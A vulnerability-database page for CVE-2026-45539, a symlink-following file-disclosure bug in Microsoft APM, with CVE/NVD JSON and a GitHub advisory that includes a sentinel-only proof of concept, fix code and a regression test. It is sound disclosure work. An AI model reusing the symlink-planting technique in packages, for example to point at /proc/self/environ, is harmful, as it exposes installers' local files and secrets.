Vulnerability-Lookup

CVE-2026-45539 (GCVE-0-2026-45539)

Vulnerability from cvelistv5 – Published: 2026-05-15 16:02 – Updated: 2026-05-15 16:41

Title

Microsoft APM: Symlinks under `.apm/prompts/` and `.apm/agents/` are dereferenced during `apm install`, copying host-local file contents into the project tree

Summary

Microsoft APM is an open-source, community-driven dependency manager for AI agents. From 0.5.4 to 0.12.4, two primitive integrators in apm-cli enumerate package files with bare Path.glob() / Path.rglob() calls and read each match with Path.read_text(), transparently following symbolic links. A symlink committed inside a remote APM dependency under .apm/prompts/<x>.prompt.md or .apm/agents/<x>.agent.md is preserved verbatim into apm_modules/ on clone and then dereferenced during integration, with the resolved content written as a regular file into the project's deploy directories. The package content_hash, the pre-deploy SecurityGate scan, and apm audit do not flag this. The deploy roots are not added to the auto-generated .gitignore, so the resulting files are staged by git add by default. This vulnerability is fixed in 0.13.0.

Severity ?

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CWE

CWE-59 - Improper Link Resolution Before File Access ('Link Following')
CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/microsoft/apm/security/advisor…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
microsoft	apm	Affected: >= 0.5.4, < 0.13.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-45539",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-15T16:41:16.377667Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-15T16:41:24.808Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "apm",
          "vendor": "microsoft",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.5.4, \u003c 0.13.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Microsoft APM is an open-source, community-driven dependency manager for AI agents. From 0.5.4 to 0.12.4, two primitive integrators in apm-cli enumerate package files with bare Path.glob() / Path.rglob() calls and read each match with Path.read_text(), transparently following symbolic links. A symlink committed inside a remote APM dependency under .apm/prompts/\u003cx\u003e.prompt.md or .apm/agents/\u003cx\u003e.agent.md is preserved verbatim into apm_modules/ on clone and then dereferenced during integration, with the resolved content written as a regular file into the project\u0027s deploy directories. The package content_hash, the pre-deploy SecurityGate scan, and apm audit do not flag this. The deploy roots are not added to the auto-generated .gitignore, so the resulting files are staged by git add by default. This vulnerability is fixed in 0.13.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-59",
              "description": "CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-15T16:02:37.591Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4"
        }
      ],
      "source": {
        "advisory": "GHSA-q5pp-gvjg-h7v4",
        "discovery": "UNKNOWN"
      },
      "title": "Microsoft APM: Symlinks under `.apm/prompts/` and `.apm/agents/` are dereferenced during `apm install`, copying host-local file contents into the project tree"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-45539",
    "datePublished": "2026-05-15T16:02:37.591Z",
    "dateReserved": "2026-05-12T17:48:47.878Z",
    "dateUpdated": "2026-05-15T16:41:24.808Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-45539",
      "date": "2026-05-25",
      "epss": "0.00069",
      "percentile": "0.21151"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-45539\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T17:16:48.887\",\"lastModified\":\"2026-05-18T19:33:24.430\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Microsoft APM is an open-source, community-driven dependency manager for AI agents. From 0.5.4 to 0.12.4, two primitive integrators in apm-cli enumerate package files with bare Path.glob() / Path.rglob() calls and read each match with Path.read_text(), transparently following symbolic links. A symlink committed inside a remote APM dependency under .apm/prompts/\u003cx\u003e.prompt.md or .apm/agents/\u003cx\u003e.agent.md is preserved verbatim into apm_modules/ on clone and then dereferenced during integration, with the resolved content written as a regular file into the project\u0027s deploy directories. The package content_hash, the pre-deploy SecurityGate scan, and apm audit do not flag this. The deploy roots are not added to the auto-generated .gitignore, so the resulting files are staged by git add by default. This vulnerability is fixed in 0.13.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N\",\"baseScore\":7.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":4.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-59\"},{\"lang\":\"en\",\"value\":\"CWE-200\"}]}],\"references\":[{\"url\":\"https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Microsoft APM: Symlinks under `.apm/prompts/` and `.apm/agents/` are dereferenced during `apm install`, copying host-local file contents into the project tree\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-59\", \"lang\": \"en\", \"description\": \"CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)\", \"type\": \"CWE\"}]}, {\"descriptions\": [{\"cweId\": \"CWE-200\", \"lang\": \"en\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"NONE\", \"baseScore\": 7.4, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"scope\": \"CHANGED\", \"userInteraction\": \"REQUIRED\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4\"}], \"affected\": [{\"vendor\": \"microsoft\", \"product\": \"apm\", \"versions\": [{\"version\": \"\u003e= 0.5.4, \u003c 0.13.0\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T16:02:37.591Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Microsoft APM is an open-source, community-driven dependency manager for AI agents. From 0.5.4 to 0.12.4, two primitive integrators in apm-cli enumerate package files with bare Path.glob() / Path.rglob() calls and read each match with Path.read_text(), transparently following symbolic links. A symlink committed inside a remote APM dependency under .apm/prompts/\u003cx\u003e.prompt.md or .apm/agents/\u003cx\u003e.agent.md is preserved verbatim into apm_modules/ on clone and then dereferenced during integration, with the resolved content written as a regular file into the project\u0027s deploy directories. The package content_hash, the pre-deploy SecurityGate scan, and apm audit do not flag this. The deploy roots are not added to the auto-generated .gitignore, so the resulting files are staged by git add by default. This vulnerability is fixed in 0.13.0.\"}], \"source\": {\"advisory\": \"GHSA-q5pp-gvjg-h7v4\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-45539\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-15T16:41:16.377667Z\"}}}], \"references\": [{\"url\": \"https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-15T16:41:10.649Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-45539\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-05-12T17:48:47.878Z\", \"datePublished\": \"2026-05-15T16:02:37.591Z\", \"dateUpdated\": \"2026-05-15T16:41:24.808Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-45539

Vulnerability from fkie_nvd - Published: 2026-05-15 17:16 - Updated: 2026-05-18 19:33

Severity ?

7.4 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Microsoft APM is an open-source, community-driven dependency manager for AI agents. From 0.5.4 to 0.12.4, two primitive integrators in apm-cli enumerate package files with bare Path.glob() / Path.rglob() calls and read each match with Path.read_text(), transparently following symbolic links. A symlink committed inside a remote APM dependency under .apm/prompts/\u003cx\u003e.prompt.md or .apm/agents/\u003cx\u003e.agent.md is preserved verbatim into apm_modules/ on clone and then dereferenced during integration, with the resolved content written as a regular file into the project\u0027s deploy directories. The package content_hash, the pre-deploy SecurityGate scan, and apm audit do not flag this. The deploy roots are not added to the auto-generated .gitignore, so the resulting files are staged by git add by default. This vulnerability is fixed in 0.13.0."
    }
  ],
  "id": "CVE-2026-45539",
  "lastModified": "2026-05-18T19:33:24.430",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.4,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 4.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-15T17:16:48.887",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-59"
        },
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-Q5PP-GVJG-H7V4

Vulnerability from github – Published: 2026-05-18 13:26 – Updated: 2026-05-18 13:26

Summary

Microsoft APM: Symlinks under `.apm/prompts/` and `.apm/agents/` are dereferenced during `apm install`, copying host-local file contents into the project tree

Details

Summary

Two primitive integrators in apm-cli enumerate package files with bare Path.glob() / Path.rglob() calls and read each match with Path.read_text(), transparently following symbolic links.

A symlink committed inside a remote APM dependency under .apm/prompts/<x>.prompt.md or .apm/agents/<x>.agent.md is preserved verbatim into apm_modules/ on clone and then dereferenced during integration, with the resolved content written as a regular file into the project's deploy directories.

The package content_hash, the pre-deploy SecurityGate scan, and apm audit do not flag this. The deploy roots are not added to the auto-generated .gitignore, so the resulting files are staged by git add by default.

This was reproduced via the standard owner/repo#tag install flow against a real bare git repository. No --force or special flags were used.

Affected code

Sinks

src/apm_cli/integration/prompt_integrator.py
PromptIntegrator.find_prompt_files: package_path.glob("*.prompt.md") and apm_prompts.glob("*.prompt.md")
No symlink filter.
src/apm_cli/integration/prompt_integrator.py
PromptIntegrator.copy_prompt: source.read_text("utf-8")
src/apm_cli/integration/agent_integrator.py
AgentIntegrator.find_agent_files: package_path.glob("*.agent.md"), apm_agents.rglob("*.agent.md"), apm_agents.rglob("*.md"), apm_chatmodes.glob("*.chatmode.md")
No symlink filter.
src/apm_cli/integration/agent_integrator.py
AgentIntegrator.copy_agent: source.read_text("utf-8")
src/apm_cli/integration/agent_integrator.py
_write_codex_agent: source.read_text("utf-8"); resolved bytes are embedded into developer_instructions of the generated .codex/agents/<name>.toml
src/apm_cli/integration/agent_integrator.py
_write_windsurf_agent_skill: same dereference pattern; resolved bytes land in .windsurf/skills/<name>/SKILL.md

Safe pattern already present in the codebase

src/apm_cli/integration/base_integrator.py
BaseIntegrator.find_files_by_glob() rejects:
symlinks via f.is_symlink()
hardlinks via f.stat().st_nlink > 1
resolved paths escaping the package root

This helper is already used by InstructionIntegrator.find_instruction_files.

Documented contract that the affected integrators violate

In src/apm_cli/install/phases/local_content.py, _copy_local_package documents the intent of preserving symlinks in apm_modules/:

This is security-relevant and not intended behavior because the codebase already documents that symlinks preserved in apm_modules/ are supposed to remain inert unless a consumer follows them safely. The affected integrators are exactly those consumer paths, and they dereference the symlink without sandboxing or symlink checks. That makes this an implementation gap, not expected design.

The affected integrators are the consumer tools that follow the link without sandboxing.

Reproducer

This proof of concept is localhost-only and uses a sentinel file, not a real secret.

It uses a real bare git repository and git config insteadOf so the install path is the same one APM uses for real GitHub clones (Repo.clone_from). No network access is required.

# 0. Clean slate
rm -rf /tmp/poc /tmp/poc_secret /tmp/poc_home
mkdir -p /tmp/poc/{remote_bare,victim_project,work_repo} /tmp/poc_home

# 1. Sentinel file outside the project and outside the package
echo 'APM-AUDIT-SENTINEL-X7Y2Q9-NOT-A-REAL-CREDENTIAL' > /tmp/poc_secret

# 2. Build a benign-looking APM package with two symlinks in it
cd /tmp/poc/work_repo
git init -q -b main .
git config user.email t@example.test
git config user.name 'PoC'

cat > apm.yml <<'YML'
name: helpful-agents
version: 1.0.0
description: Helpful AI agent collection
YML

mkdir -p .apm/agents .apm/prompts

cat > .apm/agents/helper.agent.md <<'AGENT'
---
name: helper
description: A helpful assistant
---
You are a helpful assistant.
AGENT

ln -s /tmp/poc_secret .apm/agents/notes.agent.md
ln -s /tmp/poc_secret .apm/prompts/welcome.prompt.md

git add -A
git commit -q -m "initial"
git tag v1.0.0

git ls-tree -r HEAD | grep '^120000'

# 3. Bare repo
git clone --bare -q /tmp/poc/work_repo /tmp/poc/remote_bare/helpful-agents.git

# 4. Rewrite the GitHub URL APM constructs onto the local bare repo
cat > /tmp/poc_home/.gitconfig <<'GITCONFIG'
[user]
    email = poc@example.test
    name  = PoC
[url "/tmp/poc/remote_bare/helpful-agents.git"]
    insteadOf = https://github.com/poc-author/helpful-agents
[url "/tmp/poc/remote_bare/helpful-agents.git"]
    insteadOf = https://github.com/poc-author/helpful-agents.git
[safe]
    directory = *
GITCONFIG

# 5. Victim project
mkdir -p /tmp/poc/victim_project/{.github,.claude,.cursor,.codex,.windsurf}

cat > /tmp/poc/victim_project/apm.yml <<'YML'
name: victim-project
version: 1.0.0
description: Victim project
targets: [copilot, claude, cursor, codex, windsurf]
dependencies:
  apm:
    - poc-author/helpful-agents#v1.0.0
YML

# 6. Default install, no special flags
cd /tmp/poc/victim_project
HOME=/tmp/poc_home APM_NO_CACHE=1 GITHUB_TOKEN= apm install

Observed result

Default install output:

[>] Installing dependencies from apm.yml...
[>] Resolving poc-author/helpful-agents...
[i] Targets: claude, codex, copilot, cursor, windsurf  (source: apm.yml)
  [+] poc-author/helpful-agents #v1.0.0 @fa437578
  |-- 1 prompts integrated -> .github/prompts/
  |-- 10 agents integrated -> 5 targets
[*] Installed 1 APM dependency in 0.1s.

The source under apm_modules/ remains a symlink:

ls -l apm_modules/poc-author/helpful-agents/.apm/agents/notes.agent.md
# lrwxrwxrwx ... .apm/agents/notes.agent.md -> /tmp/poc_secret

The deploy roots receive plain regular files containing the sentinel:

.github/agents/notes.agent.md
.github/prompts/welcome.prompt.md
.claude/agents/notes.md
.cursor/agents/notes.md
.codex/agents/notes.toml
.windsurf/skills/notes/SKILL.md

Example:

cat /tmp/poc/victim_project/.claude/agents/notes.md
# APM-AUDIT-SENTINEL-X7Y2Q9-NOT-A-REAL-CREDENTIAL

The deployed files persist after the original symlink target is removed:

rm /tmp/poc_secret
cat /tmp/poc/victim_project/.claude/agents/notes.md
# APM-AUDIT-SENTINEL-X7Y2Q9-NOT-A-REAL-CREDENTIAL

Defenses that did not flag the result

The pre-deploy SecurityGate.scan_files walks with followlinks=False and continues past is_symlink() files. The symlinked source is not scanned.
apm audit against the post-install tree reports no findings.
The auto-written .gitignore contains only apm_modules/. The deploy roots are not excluded, and git add -A stages all deployed files alongside apm.lock.yaml.
The package content_hash is computed before symlink resolution and remained stable across installs whose resolved deployed bytes differed.

Impact

The directly demonstrated impact is file-content disclosure.

Any file readable by the user running apm install can be selected by the package author through an absolute symlink target committed inside the dependency, and its contents are then written into the project's deploy directories as regular files.

Realistic downstream consequences

These were not separately demonstrated with real secrets, but they follow from the validated behavior:

The deploy directories (.github/, .claude/, .cursor/, .codex/, .windsurf/) are project-tracked by convention, and the auto-generated .gitignore does not exclude them.
In automation that regenerates and commits agent context, the leaked files can be pushed without human review.
A symlink target such as /proc/self/environ would resolve to the APM process environment at install time.

Why this is security-relevant and not intended behavior

This is not just "a malicious package being malicious."

The codebase already contains the correct defense in BaseIntegrator.find_files_by_glob(), and that helper explicitly rejects symlinks, hardlinks, and containment escapes. InstructionIntegrator uses it. PromptIntegrator and AgentIntegrator do not.

The codebase also documents that preserving symlinks inside apm_modules/ is acceptable only because the links are supposed to remain inert unless a consumer tool follows them safely. Here, APM itself is the consumer tool that follows them unsafely.

That architectural asymmetry makes this look like an implementation oversight, not intended behavior.

Recommended fix

Route both affected finders through the existing safe helper.

# src/apm_cli/integration/prompt_integrator.py
def find_prompt_files(self, package_path: Path) -> list[Path]:
    return self.find_files_by_glob(
        package_path, "*.prompt.md", subdirs=[".apm/prompts"]
    )

# src/apm_cli/integration/agent_integrator.py
def find_agent_files(self, package_path: Path) -> list[Path]:
    files: list[Path] = []
    files += self.find_files_by_glob(package_path, "*.agent.md")
    files += self.find_files_by_glob(package_path, "*.chatmode.md")
    files += self.find_files_by_glob(
        package_path, "*.agent.md", subdirs=[".apm/agents"]
    )
    files += self.find_files_by_glob(
        package_path, "*.md", subdirs=[".apm/agents"]
    )
    files += self.find_files_by_glob(
        package_path, "*.chatmode.md", subdirs=[".apm/chatmodes"]
    )
    return files

Optional defense in depth

In copy_prompt, copy_agent, _write_codex_agent, and _write_windsurf_agent_skill, explicitly raise on source.is_symlink() before reading.
Treat any symlink under a dependency's .apm/ tree as a security finding during scanning.

Regression test idea

Add unit tests that create a fixture package with symlinks under .apm/prompts/, .apm/agents/, and .apm/chatmodes/, then assert that the symlink entries are filtered out before any read occurs.

Example shape:

def test_symlink_under_apm_prompts_is_rejected(tmp_path):
    pkg = tmp_path / "pkg"
    (pkg / ".apm/prompts").mkdir(parents=True)

    sentinel = tmp_path / "sentinel.txt"
    sentinel.write_text("REGRESSION-SENTINEL")

    (pkg / ".apm/prompts/leak.prompt.md").symlink_to(sentinel)

    result = PromptIntegrator().find_prompt_files(pkg)

    assert all(not p.is_symlink() for p in result)
    assert not any(p.name == "leak.prompt.md" for p in result)

A second test should mirror the same pattern for AgentIntegrator.find_agent_files().

Severity ?

7.4 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.12.4"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "apm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.5.4"
            },
            {
              "fixed": "0.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45539"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-18T13:26:06Z",
    "nvd_published_at": "2026-05-15T17:16:48Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nTwo primitive integrators in `apm-cli` enumerate package files with bare `Path.glob()` / `Path.rglob()` calls and read each match with `Path.read_text()`, transparently following symbolic links.\n\nA symlink committed inside a remote APM dependency under `.apm/prompts/\u003cx\u003e.prompt.md` or `.apm/agents/\u003cx\u003e.agent.md` is preserved verbatim into `apm_modules/` on clone and then dereferenced during integration, with the resolved content written as a regular file into the project\u0027s deploy directories.\n\nThe package `content_hash`, the pre-deploy `SecurityGate` scan, and `apm audit` do not flag this. The deploy roots are not added to the auto-generated `.gitignore`, so the resulting files are staged by `git add` by default.\n\nThis was reproduced via the standard `owner/repo#tag` install flow against a real bare git repository. No `--force` or special flags were used.\n\n\n## Affected code\n\n### Sinks\n\n- `src/apm_cli/integration/prompt_integrator.py`  \n  `PromptIntegrator.find_prompt_files`: `package_path.glob(\"*.prompt.md\")` and `apm_prompts.glob(\"*.prompt.md\")`  \n  No symlink filter.\n\n- `src/apm_cli/integration/prompt_integrator.py`  \n  `PromptIntegrator.copy_prompt`: `source.read_text(\"utf-8\")`\n\n- `src/apm_cli/integration/agent_integrator.py`  \n  `AgentIntegrator.find_agent_files`: `package_path.glob(\"*.agent.md\")`, `apm_agents.rglob(\"*.agent.md\")`, `apm_agents.rglob(\"*.md\")`, `apm_chatmodes.glob(\"*.chatmode.md\")`  \n  No symlink filter.\n\n- `src/apm_cli/integration/agent_integrator.py`  \n  `AgentIntegrator.copy_agent`: `source.read_text(\"utf-8\")`\n\n- `src/apm_cli/integration/agent_integrator.py`  \n  `_write_codex_agent`: `source.read_text(\"utf-8\")`; resolved bytes are embedded into `developer_instructions` of the generated `.codex/agents/\u003cname\u003e.toml`\n\n- `src/apm_cli/integration/agent_integrator.py`  \n  `_write_windsurf_agent_skill`: same dereference pattern; resolved bytes land in `.windsurf/skills/\u003cname\u003e/SKILL.md`\n\n### Safe pattern already present in the codebase\n\n- `src/apm_cli/integration/base_integrator.py`  \n  `BaseIntegrator.find_files_by_glob()` rejects:\n  - symlinks via `f.is_symlink()`\n  - hardlinks via `f.stat().st_nlink \u003e 1`\n  - resolved paths escaping the package root\n\nThis helper is already used by `InstructionIntegrator.find_instruction_files`.\n\n### Documented contract that the affected integrators violate\n\nIn `src/apm_cli/install/phases/local_content.py`, `_copy_local_package` documents the intent of preserving symlinks in `apm_modules/`:\n\n\u003e This is security-relevant and not intended behavior because the codebase already documents that symlinks preserved in `apm_modules/` are supposed to remain inert unless a consumer follows them safely. The affected integrators are exactly those consumer paths, and they dereference the symlink without sandboxing or symlink checks. That makes this an implementation gap, not expected design.\n\nThe affected integrators are the consumer tools that follow the link without sandboxing.\n\n## Reproducer\n\nThis proof of concept is localhost-only and uses a sentinel file, not a real secret.\n\nIt uses a real bare git repository and `git config insteadOf` so the install path is the same one APM uses for real GitHub clones (`Repo.clone_from`). No network access is required.\n\n```bash\n# 0. Clean slate\nrm -rf /tmp/poc /tmp/poc_secret /tmp/poc_home\nmkdir -p /tmp/poc/{remote_bare,victim_project,work_repo} /tmp/poc_home\n\n# 1. Sentinel file outside the project and outside the package\necho \u0027APM-AUDIT-SENTINEL-X7Y2Q9-NOT-A-REAL-CREDENTIAL\u0027 \u003e /tmp/poc_secret\n\n# 2. Build a benign-looking APM package with two symlinks in it\ncd /tmp/poc/work_repo\ngit init -q -b main .\ngit config user.email t@example.test\ngit config user.name \u0027PoC\u0027\n\ncat \u003e apm.yml \u003c\u003c\u0027YML\u0027\nname: helpful-agents\nversion: 1.0.0\ndescription: Helpful AI agent collection\nYML\n\nmkdir -p .apm/agents .apm/prompts\n\ncat \u003e .apm/agents/helper.agent.md \u003c\u003c\u0027AGENT\u0027\n---\nname: helper\ndescription: A helpful assistant\n---\nYou are a helpful assistant.\nAGENT\n\nln -s /tmp/poc_secret .apm/agents/notes.agent.md\nln -s /tmp/poc_secret .apm/prompts/welcome.prompt.md\n\ngit add -A\ngit commit -q -m \"initial\"\ngit tag v1.0.0\n\ngit ls-tree -r HEAD | grep \u0027^120000\u0027\n\n# 3. Bare repo\ngit clone --bare -q /tmp/poc/work_repo /tmp/poc/remote_bare/helpful-agents.git\n\n# 4. Rewrite the GitHub URL APM constructs onto the local bare repo\ncat \u003e /tmp/poc_home/.gitconfig \u003c\u003c\u0027GITCONFIG\u0027\n[user]\n    email = poc@example.test\n    name  = PoC\n[url \"/tmp/poc/remote_bare/helpful-agents.git\"]\n    insteadOf = https://github.com/poc-author/helpful-agents\n[url \"/tmp/poc/remote_bare/helpful-agents.git\"]\n    insteadOf = https://github.com/poc-author/helpful-agents.git\n[safe]\n    directory = *\nGITCONFIG\n\n# 5. Victim project\nmkdir -p /tmp/poc/victim_project/{.github,.claude,.cursor,.codex,.windsurf}\n\ncat \u003e /tmp/poc/victim_project/apm.yml \u003c\u003c\u0027YML\u0027\nname: victim-project\nversion: 1.0.0\ndescription: Victim project\ntargets: [copilot, claude, cursor, codex, windsurf]\ndependencies:\n  apm:\n    - poc-author/helpful-agents#v1.0.0\nYML\n\n# 6. Default install, no special flags\ncd /tmp/poc/victim_project\nHOME=/tmp/poc_home APM_NO_CACHE=1 GITHUB_TOKEN= apm install\n```\n\n## Observed result\n\nDefault install output:\n\n```text\n[\u003e] Installing dependencies from apm.yml...\n[\u003e] Resolving poc-author/helpful-agents...\n[i] Targets: claude, codex, copilot, cursor, windsurf  (source: apm.yml)\n  [+] poc-author/helpful-agents #v1.0.0 @fa437578\n  |-- 1 prompts integrated -\u003e .github/prompts/\n  |-- 10 agents integrated -\u003e 5 targets\n[*] Installed 1 APM dependency in 0.1s.\n```\n\nThe source under `apm_modules/` remains a symlink:\n\n```bash\nls -l apm_modules/poc-author/helpful-agents/.apm/agents/notes.agent.md\n# lrwxrwxrwx ... .apm/agents/notes.agent.md -\u003e /tmp/poc_secret\n```\n\nThe deploy roots receive plain regular files containing the sentinel:\n\n- `.github/agents/notes.agent.md`\n- `.github/prompts/welcome.prompt.md`\n- `.claude/agents/notes.md`\n- `.cursor/agents/notes.md`\n- `.codex/agents/notes.toml`\n- `.windsurf/skills/notes/SKILL.md`\n\nExample:\n\n```bash\ncat /tmp/poc/victim_project/.claude/agents/notes.md\n# APM-AUDIT-SENTINEL-X7Y2Q9-NOT-A-REAL-CREDENTIAL\n```\n\nThe deployed files persist after the original symlink target is removed:\n\n```bash\nrm /tmp/poc_secret\ncat /tmp/poc/victim_project/.claude/agents/notes.md\n# APM-AUDIT-SENTINEL-X7Y2Q9-NOT-A-REAL-CREDENTIAL\n```\n\n## Defenses that did not flag the result\n\n- The pre-deploy `SecurityGate.scan_files` walks with 